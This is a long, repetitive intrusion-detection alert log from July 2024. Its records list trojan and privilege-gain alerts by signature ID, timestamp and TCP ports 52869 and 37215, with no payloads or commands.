                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.556915
                      SID:2831300
                      Source Port:37522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.240695
                      SID:2027339
                      Source Port:33480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.913916
                      SID:2831300
                      Source Port:55038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:07.817264
                      SID:2831300
                      Source Port:42196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.413672
                      SID:2831300
                      Source Port:42676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.939710
                      SID:2025132
                      Source Port:48304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.383849
                      SID:2835222
                      Source Port:35316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.812092
                      SID:2027339
                      Source Port:34572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.289186
                      SID:2025132
                      Source Port:44792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.993749
                      SID:2829579
                      Source Port:40078
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.460569
                      SID:2829579
                      Source Port:41372
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.571697
                      SID:2027339
                      Source Port:59418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.673228
                      SID:2831300
                      Source Port:49436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.446803
                      SID:2831300
                      Source Port:50050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.136226
                      SID:2027339
                      Source Port:41154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:19.589495
                      SID:2027339
                      Source Port:53826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.417957
                      SID:2027339
                      Source Port:55222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.590968
                      SID:2831300
                      Source Port:35096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2835222
                      Source Port:55276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.012420
                      SID:2027339
                      Source Port:59956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.464393
                      SID:2027339
                      Source Port:53160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.517784
                      SID:2027339
                      Source Port:52538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.496981
                      SID:2027339
                      Source Port:53840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.507185
                      SID:2831300
                      Source Port:48028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.565160
                      SID:2025132
                      Source Port:48292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.482595
                      SID:2831300
                      Source Port:36966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2835222
                      Source Port:55012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.252148
                      SID:2027339
                      Source Port:42312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.548834
                      SID:2025132
                      Source Port:51182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.085193
                      SID:2829579
                      Source Port:60072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.801468
                      SID:2025132
                      Source Port:44476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.166678
                      SID:2831300
                      Source Port:35868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:53.291407
                      SID:2025132
                      Source Port:56922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:50.028546
                      SID:2831300
                      Source Port:35390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.474845
                      SID:2027339
                      Source Port:42796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.239423
                      SID:2025132
                      Source Port:36704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.159646
                      SID:2025132
                      Source Port:33116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.227636
                      SID:2831300
                      Source Port:58748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.232547
                      SID:2831300
                      Source Port:60446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.437168
                      SID:2831300
                      Source Port:55826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.093345
                      SID:2025132
                      Source Port:53032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.960598
                      SID:2831300
                      Source Port:44946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.805275
                      SID:2025132
                      Source Port:55958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2835222
                      Source Port:40564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.248398
                      SID:2025132
                      Source Port:46068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:45.997240
                      SID:2025132
                      Source Port:36896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.086216
                      SID:2835222
                      Source Port:35240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.135626
                      SID:2835222
                      Source Port:60090
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.614636
                      SID:2027339
                      Source Port:38052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.460569
                      SID:2835222
                      Source Port:51274
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.526744
                      SID:2027339
                      Source Port:52730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.466707
                      SID:2831300
                      Source Port:50828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:55.239442
                      SID:2027339
                      Source Port:34506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2829579
                      Source Port:46850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2835222
                      Source Port:59818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625708
                      SID:2835222
                      Source Port:41154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.435855
                      SID:2025132
                      Source Port:60652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.855567
                      SID:2829579
                      Source Port:54542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2829579
                      Source Port:48564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.182639
                      SID:2025132
                      Source Port:40828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.134564
                      SID:2835222
                      Source Port:60672
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.532287
                      SID:2027339
                      Source Port:60684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.166360
                      SID:2027339
                      Source Port:58258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.239251
                      SID:2027339
                      Source Port:36830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2835222
                      Source Port:33960
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.820676
                      SID:2027339
                      Source Port:58866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.600919
                      SID:2027339
                      Source Port:35416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.121210
                      SID:2835222
                      Source Port:44812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.062143
                      SID:2027339
                      Source Port:38766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.130961
                      SID:2831300
                      Source Port:46228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.295378
                      SID:2027339
                      Source Port:54198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.780537
                      SID:2027339
                      Source Port:46208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.865744
                      SID:2831300
                      Source Port:34034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2835222
                      Source Port:53906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.528209
                      SID:2025132
                      Source Port:49646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.439167
                      SID:2835222
                      Source Port:60860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2835222
                      Source Port:38450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.995753
                      SID:2027339
                      Source Port:40852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.946390
                      SID:2027339
                      Source Port:38556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.200464
                      SID:2025132
                      Source Port:54874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.530339
                      SID:2027339
                      Source Port:50028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.158885
                      SID:2027339
                      Source Port:56206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.006516
                      SID:2027339
                      Source Port:35020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.135626
                      SID:2835222
                      Source Port:59708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.466707
                      SID:2831300
                      Source Port:49030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.993749
                      SID:2835222
                      Source Port:41138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.054227
                      SID:2835222
                      Source Port:37728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.327041
                      SID:2025132
                      Source Port:59436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.184596
                      SID:2025132
                      Source Port:49922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.478142
                      SID:2027339
                      Source Port:56552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.931996
                      SID:2027339
                      Source Port:60762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.402085
                      SID:2829579
                      Source Port:37014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.447452
                      SID:2831300
                      Source Port:45752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.055908
                      SID:2835222
                      Source Port:35654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.572216
                      SID:2025132
                      Source Port:60306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2829579
                      Source Port:52662
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.510455
                      SID:2829579
                      Source Port:32888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.350524
                      SID:2025132
                      Source Port:51432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:53.637724
                      SID:2027339
                      Source Port:59982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.560327
                      SID:2831300
                      Source Port:48346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.594551
                      SID:2025132
                      Source Port:59248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.374653
                      SID:2835222
                      Source Port:51292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861088
                      SID:2829579
                      Source Port:33132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.718589
                      SID:2027339
                      Source Port:58612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.619304
                      SID:2831300
                      Source Port:50438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.057117
                      SID:2027339
                      Source Port:38476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.643171
                      SID:2025132
                      Source Port:54606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.991937
                      SID:2025132
                      Source Port:56958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.685689
                      SID:2027339
                      Source Port:58514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953643
                      SID:2829579
                      Source Port:51470
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.233952
                      SID:2027339
                      Source Port:58058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.177523
                      SID:2027339
                      Source Port:35258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.930679
                      SID:2025132
                      Source Port:43048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.202361
                      SID:2027339
                      Source Port:47542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.441297
                      SID:2831300
                      Source Port:37968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.676146
                      SID:2027339
                      Source Port:55746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.163232
                      SID:2831300
                      Source Port:54468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.358336
                      SID:2025132
                      Source Port:50238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.944157
                      SID:2829579
                      Source Port:38246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.210083
                      SID:2027339
                      Source Port:46444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.227564
                      SID:2025132
                      Source Port:43064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:53.291407
                      SID:2027339
                      Source Port:38084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.119639
                      SID:2835222
                      Source Port:52726
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.004757
                      SID:2027339
                      Source Port:60122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.527690
                      SID:2831300
                      Source Port:58296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.685214
                      SID:2829579
                      Source Port:42628
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.309569
                      SID:2025132
                      Source Port:33046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.426800
                      SID:2027339
                      Source Port:34152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.651508
                      SID:2027339
                      Source Port:33902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.524280
                      SID:2027339
                      Source Port:53412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.148721
                      SID:2027339
                      Source Port:47716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.433850
                      SID:2027339
                      Source Port:53860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.145992
                      SID:2835222
                      Source Port:34236
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.485669
                      SID:2831300
                      Source Port:50860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:38.067768
                      SID:2027339
                      Source Port:38616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.686896
                      SID:2025132
                      Source Port:49576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.748554
                      SID:2829579
                      Source Port:37480
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.805050
                      SID:2831300
                      Source Port:57122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.791586
                      SID:2027339
                      Source Port:57930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.189668
                      SID:2831300
                      Source Port:54518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:24.853073
                      SID:2027339
                      Source Port:43288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.443569
                      SID:2831300
                      Source Port:39000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.967288
                      SID:2027339
                      Source Port:60224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.476019
                      SID:2027339
                      Source Port:34582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:55.227510
                      SID:2831300
                      Source Port:52000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.440953
                      SID:2027339
                      Source Port:35782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.320570
                      SID:2027339
                      Source Port:33344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2829579
                      Source Port:53434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.008667
                      SID:2025132
                      Source Port:33724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.488770
                      SID:2831300
                      Source Port:60024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.867091
                      SID:2027339
                      Source Port:46972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.309937
                      SID:2025132
                      Source Port:41200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.257276
                      SID:2025132
                      Source Port:55524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.800446
                      SID:2829579
                      Source Port:57194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2835222
                      Source Port:34370
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.454427
                      SID:2831300
                      Source Port:39910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2829579
                      Source Port:60662
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.330643
                      SID:2027339
                      Source Port:52102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.409616
                      SID:2025132
                      Source Port:40444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.136885
                      SID:2027339
                      Source Port:38012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.489811
                      SID:2831300
                      Source Port:52782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.491493
                      SID:2027339
                      Source Port:43614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.909217
                      SID:2025132
                      Source Port:53072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:08:36.017976
                      SID:2831300
                      Source Port:46328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2835222
                      Source Port:36842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.590112
                      SID:2829579
                      Source Port:46694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.139331
                      SID:2025132
                      Source Port:52266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.542034
                      SID:2829579
                      Source Port:40512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2829579
                      Source Port:57632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.005197
                      SID:2027339
                      Source Port:47112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.453008
                      SID:2027339
                      Source Port:58900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.006350
                      SID:2027339
                      Source Port:49064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.475273
                      SID:2831300
                      Source Port:47700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:31.391870
                      SID:2027339
                      Source Port:54064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.329793
                      SID:2835222
                      Source Port:56640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.258778
                      SID:2025132
                      Source Port:43206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.839000
                      SID:2025132
                      Source Port:38646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.329793
                      SID:2835222
                      Source Port:55000
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2835222
                      Source Port:57522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.546679
                      SID:2027339
                      Source Port:41272
                      Destination Port:52869
